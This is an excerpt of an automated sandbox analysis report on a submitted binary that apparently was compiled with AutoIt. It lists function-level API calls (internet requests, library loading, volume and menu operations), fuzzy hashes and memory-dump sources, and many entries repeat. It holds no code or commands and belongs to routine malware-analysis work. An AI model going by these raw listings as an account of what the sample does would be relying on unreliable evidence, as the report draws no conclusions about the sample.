Similarity
• API ID: CloseExecuteHandleShell_wcscpy_wcslen
• String ID: <$@
• API String ID: 2417854910-1426351568
• Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
• Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
• Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
• Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
Similarity
• API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
• String ID:
• API String ID: 3705125965-3916222277
• Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
• Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
• Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
• Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
APIs
• GetMenuItemInfoW.USER32 ref: 0045FAC4
• DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
• DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
Similarity
• API ID: Menu$Delete$InfoItem
• String ID: 0
• API String ID: 135850232-4108050209
• Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
• Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
• Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
• Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
APIs
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
• GetWindowLongW.USER32(?,000000F0), ref: 0045087D
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
Similarity
• API ID: Window$Long
• String ID: SysTreeView32
• API String ID: 847901565-1698111956
• Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
• Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
• Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
• Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
APIs
• LoadLibraryA.KERNEL32(?), ref: 00434B10
• GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
• FreeLibrary.KERNEL32(?), ref: 00434B9F
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: AU3_GetPluginDetails
• API String ID: 145871493-4132174516
• Opcode ID: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
• Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
• Opcode Fuzzy Hash: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
• Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
APIs
• SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
Strings
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window
                                                                          • String ID: SysMonthCal32
                                                                          • API String ID: 2326795674-1439706946
                                                                          • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                          • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                                          • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                          • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
APIs
• DestroyWindow.USER32(00000000), ref: 00450A2F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
Similarity
• API ID: DestroyWindow
• String ID: msctls_updown32
• API String ID: 3375834691-2298589950
• Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
• Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
• Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
• Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
Similarity
• API ID: _memmove
• String ID: $<
• API String ID: 4104443479-428540627
• Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
• Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
• Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
• Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D79D
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID: \VH
• API String ID: 1682464887-234962358
• Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
• Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
• Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
• Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D79D
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID: \VH
• API String ID: 1682464887-234962358
• Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
• Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
• Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
• Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D87B
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID: \VH
• API String ID: 1682464887-234962358
• Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
• Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
• Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
• Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D37E
• GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
Strings
Memory Dump Source
• Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
Similarity
• API ID: ErrorMode$InformationVolume
• String ID: \VH
• API String ID: 2507767853-234962358
• Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
• Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
• Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
• Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D55C
• GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
Strings
Memory Dump Source
• Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
Similarity
• API ID: ErrorMode$InformationVolume
• String ID: \VH
• API String ID: 2507767853-234962358
• Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
• Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
• Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
• Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
• SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
• Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
• Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
• Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
• Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• CLSIDFromString.OLE32(?,00000000), ref: 00435236
• SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
• SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
Similarity
• API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
• String ID: crts
• API String ID: 943502515-3724388283
• Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
• Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
• Opcode Fuzzy Hash: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
• Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                                          APIs
                                                                            • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                          • CoInitialize.OLE32(00000000), ref: 0046E505
                                                                          • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                                          • CoUninitialize.OLE32 ref: 0046E53D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                          • String ID: .lnk
                                                                          • API String ID: 886957087-24824748
                                                                          • Opcode ID: ca4e97b0deac3c583c427a3e57c18447ee07ba297a7231e98f3a70961bae8bd6
                                                                          • Instruction ID: 8523b4f55483354ee3aaa8e7e2ee5f8b04597d59409be9d2747526508be4cfd1
                                                                          • Opcode Fuzzy Hash: ca4e97b0deac3c583c427a3e57c18447ee07ba297a7231e98f3a70961bae8bd6
                                                                          • Instruction Fuzzy Hash: E72183312082009FD700EF55C985F4AB7F4AF88729F14866EF9589B2E1D7B4E804CB56
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                                          • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                                          • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$LabelVolume
                                                                          • String ID: \VH
                                                                          • API String ID: 2006950084-234962358
                                                                          • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                          • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                                          • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                          • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                                          APIs
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • GetMenuItemInfoW.USER32 ref: 00449727
                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                                          • DrawMenuBar.USER32 ref: 00449761
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$InfoItem$Draw_malloc
                                                                          • String ID: 0
                                                                          • API String ID: 772068139-4108050209
                                                                          • Opcode ID: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                                                          • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                                          • Opcode Fuzzy Hash: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                                                          • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$_wcscpy
                                                                          • String ID: 3, 3, 8, 1
                                                                          • API String ID: 3469035223-357260408
                                                                          • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                          • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                                          • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                          • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                                          • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: ICMP.DLL$IcmpCloseHandle
                                                                          • API String ID: 2574300362-3530519716
                                                                          • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                          • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                                          • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                          • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                                          • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                                          Strings
                                                                          Memory Dump Source
